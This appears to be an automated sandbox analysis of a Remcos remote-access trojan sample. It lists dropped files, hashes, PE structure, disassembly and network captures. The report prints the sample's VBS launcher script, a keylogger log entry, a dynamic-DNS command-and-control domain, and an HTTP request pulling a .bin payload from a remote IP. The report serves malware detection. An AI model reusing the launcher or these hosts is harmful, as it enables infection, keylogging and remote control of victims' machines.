                              Document.1-xml.eml.exeGet hashmaliciousBrowse
                              • 194.5.98.136
                              2 ( P-O DRAWINGS ) SUPPLY PRODUCT.exeGet hashmaliciousBrowse
                              • 194.5.98.212
                              ynFBVCYIcu.exeGet hashmaliciousBrowse
                              • 194.5.98.195
                              #RFQ ORDER7678432213211.exeGet hashmaliciousBrowse
                              • 194.5.98.120
                              ORDER.exeGet hashmaliciousBrowse
                              • 194.5.98.23

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.exe
                              Process:C:\Users\user\Desktop\loKmeabs9V.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):114688
                              Entropy (8bit):6.65828072595929
                              Encrypted:false
                              SSDEEP:1536:hSGTBAAP0gRQhGuloEWu6Y9yaipBhHaWQmiPYDqulcgRQhWSGTBAAP:hSGTBxChTlHWu6jbfFtDXlKhWSGTBx
                              MD5:E0D74762F123EB6603898D1482EB9752
                              SHA1:EE63AF5C34A027BA8B8331DD678B15E7A87D26A6
                              SHA-256:F06E4C96E86C0F36C82D38DE0627C0B81995656C4DCBC136C0FEDDA868ED8EA0
                              SHA-512:0F1DAEC7056919C4C7662DA12F99DC5300243B039EC98F162F1F6EB391DD9905B240ABFBC63AF3D662C0BA4AE6515FA11A3352B72354EE0C7A1B4147D2C2313A
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: Virustotal, Detection: 20%, Browse
                              • Antivirus: Metadefender, Detection: 6%, Browse
                              • Antivirus: ReversingLabs, Detection: 13%
                              Reputation:low
                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L......J.................@..........D........P....@.................................r........................................K..(....p...[..................................................................(... .......|............................text....>.......@.................. ..`.data...\....P.......P..............@....rsrc....[...p...`...`..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................
                              C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.vbs
                              Process:C:\Users\user\Desktop\loKmeabs9V.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):116
                              Entropy (8bit):4.966412428636319
                              Encrypted:false
                              SSDEEP:3:jfF+m8nhvF3mRDWXp5cViE2J5xAIjuHChCn:jFqhv9IWXp+N23faihCn
                              MD5:B8755622AB5BB996534972B79851BBF5
                              SHA1:1ECF426DB043D2C14B307AA695132BBD037919DA
                              SHA-256:B05ECC5EB60DFE897EBFBEBCD8FDD2B3C25B5C0FD1882F7B30F822B5B22E6A7E
                              SHA-512:7123EF8223CB676399A9E74C371B028690EF2F07F614E25B0A34104BD062CEFBD456C5B0E82EFB6E0A34C79BBB93CD6488AC55C7B25EAAFCD81298FAC6DEDC48
                              Malicious:true
                              Reputation:low
                              Preview: Set W = CreateObject("WScript.Shell")..Set C = W.Exec ("C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.exe")
                              C:\Users\user\AppData\Local\Temp\syqduvyml
                              Process:C:\Users\user\Desktop\loKmeabs9V.exe
                              File Type:Little-endian UTF-16 Unicode text, with no line terminators
                              Category:dropped
                              Size (bytes):2
                              Entropy (8bit):1.0
                              Encrypted:false
                              SSDEEP:3:Qn:Qn
                              MD5:F3B25701FE362EC84616A93A45CE9998
                              SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                              SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                              SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview: ..
                              C:\Users\user\AppData\Roaming\remcos\logs.dat
                              Process:C:\Users\user\Desktop\loKmeabs9V.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):148
                              Entropy (8bit):3.323472271291229
                              Encrypted:false
                              SSDEEP:3:rklKlmvNBlfPl1NUlwi5JWRal2Jl+7R0DAlBG4LNQblovDl9il:IlKILHslj5YcIeeDAlybW/G
                              MD5:74C265BB113D25076A17CDBAED9500EB
                              SHA1:F6A406BB0D842FD7C189DD73A816998E1C98797E
                              SHA-256:C38067D9FFB58F898F2A038AC35C6A05EFCC30E3C3CA670CE037BBA1F9BD0B0C
                              SHA-512:00F4B99F135EFE290A6C4C20EA61B297DAF39A0671D4F7C9C2073688D4C053243930D99F231800043DD84614FB3EDA1AFF6055FE06157FB4008E1B07ADDFA7C9
                              Malicious:false
                              Reputation:low
                              Preview: ....[.2.0.2.1./.0.8./.0.2. .1.5.:.0.2.:.1.5. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r. .].....

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):6.65828072595929
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:loKmeabs9V.exe
                              File size:114688
                              MD5:e0d74762f123eb6603898d1482eb9752
                              SHA1:ee63af5c34a027ba8b8331dd678b15e7a87d26a6
                              SHA256:f06e4c96e86c0f36c82d38de0627c0b81995656c4dcbc136c0fedda868ed8ea0
                              SHA512:0f1daec7056919c4c7662da12f99dc5300243b039ec98f162f1f6eb391dd9905b240abfbc63af3d662c0ba4ae6515fa11a3352b72354ee0c7a1b4147d2c2313a
                              SSDEEP:1536:hSGTBAAP0gRQhGuloEWu6Y9yaipBhHaWQmiPYDqulcgRQhWSGTBAAP:hSGTBxChTlHWu6jbfFtDXlKhWSGTBx
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L......J.................@..........D........P....@................

                              File Icon

                              Icon Hash:6a6a2a6a2a2a2a2a

                              Static PE Info

                              General

                              Entrypoint:0x401144
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                              DLL Characteristics:
                              Time Stamp:0x4A04FEB2 [Sat May 9 03:55:30 2009 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:5565993a5a9f2bfb76f28ab304be6bc1

                              Entrypoint Preview

                              Instruction
                              push 00406C04h
                              call 00007F72D4EC7EA5h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              xor byte ptr [eax], al
                              add byte ptr [eax], al
                              inc eax
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax+ebp*2], al
                              cdq
                              shl byte ptr [ebp-4Ah], cl
                              cmp al, 4Eh
                              mov eax, 39F14AE7h
                              xchg eax, ecx
                              jnle 00007F72D4EC7E38h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add dword ptr [eax], eax
                              add byte ptr [eax], al
                              inc edx
                              add byte ptr [esi], al
                              push eax
                              add dword ptr [ecx], 41h
                              dec esi
                              dec esi
                              dec edi
                              dec esi
                              inc ebx
                              inc ebp
                              push edx
                              dec ecx
                              dec esi
                              inc edi
                              inc ebp
                              dec esi
                              push ebx
                              add byte ptr [ebx], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              dec esp
                              xor dword ptr [eax], eax
                              pop es
                              test al, 83h
                              in eax, dx
                              rol ecx, 21h
                              pushfd
                              inc eax
                              mov edx, CE82C659h
                              inc esp
                              fidivr word ptr [eax+1A7833A9h]
                              xor ecx, edi
                              mov ch, 4Eh
                              cwde
                              adc eax, 5544968Fh
                              adc edi, dword ptr [edx]
                              cmp cl, byte ptr [edi-53h]
                              xor ebx, dword ptr [ecx-48EE309Ah]
                              or al, 00h
                              stosb
                              add byte ptr [eax-2Dh], ah
                              xchg eax, ebx
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              jne 00007F72D4EC7F0Bh
                              add byte ptr [eax], al
                              cmp bl, byte ptr [eax+00h]
                              add byte ptr [eax], al
                              str word ptr [esi+4Fh]
                              dec esi
                              inc esp
                              inc ebp
                              inc esi
                              dec ecx
                              inc ebx
                              dec ecx
                              inc ebp
                              dec esi
                              inc ebx
                              dec ecx
                              inc ebp
                              push ebx
                              add byte ptr [00000E01h], cl

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x14b940x28.text
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x170000x5baa.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2280x20
                              IMAGE_DIRECTORY_ENTRY_IAT0x10000x7c.text
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x10000x13e140x14000False0.648217773437data7.07623900315IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                              .data0x150000x115c0x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                              .rsrc0x170000x5baa0x6000False0.545979817708data6.0375627219IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                              Resources

                              NameRVASizeTypeLanguageCountry
                              RT_ICON0x1bd020xea8data
                              RT_ICON0x1b45a0x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 3507421495, next used block 3509654332
                              RT_ICON0x1aef20x568GLS_BINARY_LSB_FIRST
                              RT_ICON0x1894a0x25a8data
                              RT_ICON0x178a20x10a8data
                              RT_ICON0x1743a0x468GLS_BINARY_LSB_FIRST
                              RT_GROUP_ICON0x173e00x5adata
                              RT_VERSION0x171e00x200dataChineseTaiwan

                              Imports

                              DLLImport
                              MSVBVM60.DLL_CIcos, _adj_fptan, _adj_fdiv_m64, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, _adj_fdiv_m16i, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaErrorOverflow, _adj_fdiv_m32i, _adj_fdivr_m32i, _adj_fdivr_m32, _adj_fdiv_r, _CIatan, _allmul, _CItan, _CIexp

                              Version Infos

                              DescriptionData
                              Translation0x0404 0x04b0
                              ProductVersion1.00
                              InternalNameTROSSKIFTERNES
                              FileVersion1.00
                              OriginalFilenameTROSSKIFTERNES.exe
                              ProductNameCOUNTERPART

                              Possible Origin

                              Language of compilation systemCountry where language is spokenMap
                              ChineseTaiwan

                              Network Behavior

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Aug 2, 2021 15:03:09.932041883 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:09.983387947 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:09.983831882 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.036514997 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.036640882 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.090718031 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.090797901 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.090838909 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.090862036 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.090874910 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.090895891 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.090924978 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.142365932 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.142405033 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.142424107 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.142442942 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.142462015 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.142479897 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.142499924 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.142518997 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.142592907 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.142682076 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.194062948 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.194097996 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.194116116 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.194135904 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.194155931 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.194175005 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.194197893 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.194219112 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.194240093 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.194259882 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.194279909 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.194281101 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.194298983 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.194319010 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.194338083 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.194361925 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.194380045 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.194382906 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.194431067 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.194624901 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.245873928 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.245919943 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.245935917 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.245954990 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.245978117 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.246001959 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.246037960 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.246057987 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.246078968 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.246098042 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.246117115 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.246138096 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.246160030 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.246181011 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.246201038 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.246220112 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.246239901 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.246258974 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.246279001 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.246298075 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.246320963 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.246345043 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.246364117 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.246383905 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.246402979 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.246421099 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.246440887 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.246438980 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.246459961 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.246481895 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.246620893 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.297890902 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.297957897 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.298026085 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.298057079 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.298095942 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.298125029 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.298155069 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.298183918 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.298214912 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.298245907 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.298248053 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.298276901 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.298305988 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.298330069 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.298341990 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.298365116 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.298378944 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.298397064 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.298409939 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.298434019 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.298439980 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.298465014 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.298471928 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.298508883 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.298532009 CEST4973480192.168.2.3101.99.94.119
                              Aug 2, 2021 15:03:10.298661947 CEST8049734101.99.94.119192.168.2.3
                              Aug 2, 2021 15:03:10.298697948 CEST8049734101.99.94.119192.168.2.3

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Aug 2, 2021 15:01:02.679708958 CEST53601528.8.8.8192.168.2.3
                              Aug 2, 2021 15:01:03.987540007 CEST5754453192.168.2.38.8.8.8
                              Aug 2, 2021 15:01:04.015264988 CEST53575448.8.8.8192.168.2.3
                              Aug 2, 2021 15:01:05.756846905 CEST5598453192.168.2.38.8.8.8
                              Aug 2, 2021 15:01:05.781485081 CEST53559848.8.8.8192.168.2.3
                              Aug 2, 2021 15:01:06.778383970 CEST6418553192.168.2.38.8.8.8
                              Aug 2, 2021 15:01:06.805119038 CEST53641858.8.8.8192.168.2.3
                              Aug 2, 2021 15:01:08.096107006 CEST6511053192.168.2.38.8.8.8
                              Aug 2, 2021 15:01:08.136997938 CEST53651108.8.8.8192.168.2.3
                              Aug 2, 2021 15:01:10.938198090 CEST5836153192.168.2.38.8.8.8
                              Aug 2, 2021 15:01:10.964843035 CEST53583618.8.8.8192.168.2.3
                              Aug 2, 2021 15:01:11.947202921 CEST6349253192.168.2.38.8.8.8
                              Aug 2, 2021 15:01:11.973643064 CEST53634928.8.8.8192.168.2.3
                              Aug 2, 2021 15:01:13.580502987 CEST6083153192.168.2.38.8.8.8
                              Aug 2, 2021 15:01:13.605627060 CEST53608318.8.8.8192.168.2.3
                              Aug 2, 2021 15:01:14.742151022 CEST6010053192.168.2.38.8.8.8
                              Aug 2, 2021 15:01:14.767044067 CEST53601008.8.8.8192.168.2.3
                              Aug 2, 2021 15:01:16.048583031 CEST5319553192.168.2.38.8.8.8
                              Aug 2, 2021 15:01:16.073540926 CEST53531958.8.8.8192.168.2.3
                              Aug 2, 2021 15:01:16.851861954 CEST5014153192.168.2.38.8.8.8
                              Aug 2, 2021 15:01:16.879432917 CEST53501418.8.8.8192.168.2.3
                              Aug 2, 2021 15:01:17.866914988 CEST5302353192.168.2.38.8.8.8
                              Aug 2, 2021 15:01:17.894478083 CEST53530238.8.8.8192.168.2.3
                              Aug 2, 2021 15:01:18.987708092 CEST4956353192.168.2.38.8.8.8
                              Aug 2, 2021 15:01:19.015850067 CEST53495638.8.8.8192.168.2.3
                              Aug 2, 2021 15:01:19.910012007 CEST5135253192.168.2.38.8.8.8
                              Aug 2, 2021 15:01:19.939580917 CEST53513528.8.8.8192.168.2.3
                              Aug 2, 2021 15:01:20.738210917 CEST5934953192.168.2.38.8.8.8
                              Aug 2, 2021 15:01:20.772495031 CEST53593498.8.8.8192.168.2.3
                              Aug 2, 2021 15:01:21.799954891 CEST5708453192.168.2.38.8.8.8
                              Aug 2, 2021 15:01:21.832734108 CEST53570848.8.8.8192.168.2.3
                              Aug 2, 2021 15:01:22.879910946 CEST5882353192.168.2.38.8.8.8
                              Aug 2, 2021 15:01:22.915153027 CEST53588238.8.8.8192.168.2.3
                              Aug 2, 2021 15:01:35.138012886 CEST5756853192.168.2.38.8.8.8
                              Aug 2, 2021 15:01:35.181376934 CEST53575688.8.8.8192.168.2.3
                              Aug 2, 2021 15:01:38.873280048 CEST5054053192.168.2.38.8.8.8
                              Aug 2, 2021 15:01:38.910888910 CEST53505408.8.8.8192.168.2.3
                              Aug 2, 2021 15:01:56.939182997 CEST5436653192.168.2.38.8.8.8
                              Aug 2, 2021 15:01:56.971487045 CEST53543668.8.8.8192.168.2.3
                              Aug 2, 2021 15:02:07.444068909 CEST5303453192.168.2.38.8.8.8
                              Aug 2, 2021 15:02:07.484725952 CEST53530348.8.8.8192.168.2.3
                              Aug 2, 2021 15:02:13.566667080 CEST5776253192.168.2.38.8.8.8
                              Aug 2, 2021 15:02:13.604362965 CEST53577628.8.8.8192.168.2.3
                              Aug 2, 2021 15:03:04.942322969 CEST5543553192.168.2.38.8.8.8
                              Aug 2, 2021 15:03:04.982295036 CEST53554358.8.8.8192.168.2.3
                              Aug 2, 2021 15:03:10.911448002 CEST5071353192.168.2.38.8.8.8
                              Aug 2, 2021 15:03:10.946295977 CEST53507138.8.8.8192.168.2.3
                              Aug 2, 2021 15:03:39.918612003 CEST5613253192.168.2.38.8.8.8
                              Aug 2, 2021 15:03:39.952965975 CEST53561328.8.8.8192.168.2.3
                              Aug 2, 2021 15:03:40.385349989 CEST5898753192.168.2.38.8.8.8
                              Aug 2, 2021 15:03:40.433784962 CEST53589878.8.8.8192.168.2.3
                              Aug 2, 2021 15:04:00.486310959 CEST5657953192.168.2.38.8.8.8
                              Aug 2, 2021 15:04:00.524296045 CEST53565798.8.8.8192.168.2.3
                              Aug 2, 2021 15:04:01.135952950 CEST6063353192.168.2.38.8.8.8
                              Aug 2, 2021 15:04:01.168286085 CEST53606338.8.8.8192.168.2.3
                              Aug 2, 2021 15:04:01.870608091 CEST6129253192.168.2.38.8.8.8
                              Aug 2, 2021 15:04:01.903352976 CEST53612928.8.8.8192.168.2.3
                              Aug 2, 2021 15:04:02.285778999 CEST6361953192.168.2.38.8.8.8
                              Aug 2, 2021 15:04:02.320975065 CEST53636198.8.8.8192.168.2.3
                              Aug 2, 2021 15:04:02.875510931 CEST6493853192.168.2.38.8.8.8
                              Aug 2, 2021 15:04:02.908174992 CEST53649388.8.8.8192.168.2.3
                              Aug 2, 2021 15:04:03.801573038 CEST6194653192.168.2.38.8.8.8
                              Aug 2, 2021 15:04:03.826596022 CEST53619468.8.8.8192.168.2.3
                              Aug 2, 2021 15:04:04.335899115 CEST6491053192.168.2.38.8.8.8
                              Aug 2, 2021 15:04:04.414990902 CEST53649108.8.8.8192.168.2.3
                              Aug 2, 2021 15:04:05.035968065 CEST5212353192.168.2.38.8.8.8
                              Aug 2, 2021 15:04:05.060872078 CEST53521238.8.8.8192.168.2.3
                              Aug 2, 2021 15:04:05.853852034 CEST5613053192.168.2.38.8.8.8
                              Aug 2, 2021 15:04:05.889024019 CEST53561308.8.8.8192.168.2.3
                              Aug 2, 2021 15:04:06.251069069 CEST5633853192.168.2.38.8.8.8
                              Aug 2, 2021 15:04:06.283968925 CEST53563388.8.8.8192.168.2.3
                              Aug 2, 2021 15:05:57.832459927 CEST5942053192.168.2.38.8.8.8
                              Aug 2, 2021 15:05:57.866383076 CEST53594208.8.8.8192.168.2.3
                              Aug 2, 2021 15:05:58.471285105 CEST5878453192.168.2.38.8.8.8
                              Aug 2, 2021 15:05:58.496082067 CEST53587848.8.8.8192.168.2.3
                              Aug 2, 2021 15:06:02.476249933 CEST6397853192.168.2.38.8.8.8
                              Aug 2, 2021 15:06:02.524781942 CEST53639788.8.8.8192.168.2.3
                              Aug 2, 2021 15:06:06.554744959 CEST6293853192.168.2.38.8.8.8
                              Aug 2, 2021 15:06:06.611047983 CEST53629388.8.8.8192.168.2.3
                              Aug 2, 2021 15:06:06.867002010 CEST5570853192.168.2.38.8.8.8
                              Aug 2, 2021 15:06:06.894660950 CEST53557088.8.8.8192.168.2.3
                              Aug 2, 2021 15:08:37.862473965 CEST5680353192.168.2.38.8.8.8
                              Aug 2, 2021 15:08:37.909857988 CEST53568038.8.8.8192.168.2.3
                              Aug 2, 2021 15:09:14.032036066 CEST5714553192.168.2.38.8.8.8
                              Aug 2, 2021 15:09:14.071578026 CEST53571458.8.8.8192.168.2.3

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                              Aug 2, 2021 15:03:10.911448002 CEST192.168.2.38.8.8.80x89afStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                              Aug 2, 2021 15:03:10.946295977 CEST8.8.8.8192.168.2.30x89afNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                              Aug 2, 2021 15:05:57.866383076 CEST8.8.8.8192.168.2.30x19b6No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.akadns.netCNAME (Canonical name)IN (0x0001)

                              HTTP Request Dependency Graph

                              • 101.99.94.119

                              HTTP Packets

                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              0192.168.2.349734101.99.94.11980C:\Users\user\Desktop\loKmeabs9V.exe
                              TimestampkBytes transferredDirectionData
                              Aug 2, 2021 15:03:10.036640882 CEST5267OUTGET /WEALTH_PRUuqVZw139.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                              Host: 101.99.94.119
                              Cache-Control: no-cache
